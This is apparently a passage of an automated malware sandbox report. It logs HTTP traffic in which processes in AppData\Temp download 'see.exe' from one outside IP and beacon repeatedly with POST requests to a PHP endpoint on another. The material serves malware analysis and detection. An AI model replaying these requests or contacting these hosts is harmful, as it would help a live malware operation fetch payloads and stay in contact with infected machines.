                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:08.752182007 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:08 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        71192.168.2.559043185.216.214.217806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:07.884906054 CEST62OUTGET /cdn-directory/see.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 185.216.214.217


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        72192.168.2.559044185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:08.861418009 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:09.500039101 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:09 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:09.501352072 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:09.692513943 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:09 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        73192.168.2.559045185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:09.814764023 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:10.454303980 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:10 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:10.455308914 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:10.646157980 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:10 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        74192.168.2.559046185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:10.770085096 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:11.406197071 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:11 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:11.408524036 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:11.779352903 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:11 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        75192.168.2.559047185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:11.894479036 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:12.539943933 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:12 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:12.541497946 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:12.738663912 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:12 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        76192.168.2.559048185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:12.861882925 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:13.513518095 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:13 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:13.514918089 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:13.707487106 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:13 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        77192.168.2.559049185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:13.836572886 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:14.497123003 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:14 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:14.498358965 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:14.692672014 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:14 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        78192.168.2.559050185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:14.814280033 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:15.459012032 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:15 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:15.461884022 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:15.936157942 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:15 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:15.936427116 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:15 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        79192.168.2.559051185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:16.048362017 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:16.704828024 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:16 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:16.706048965 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:16.900558949 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:16 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        80192.168.2.559052185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:17.023246050 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
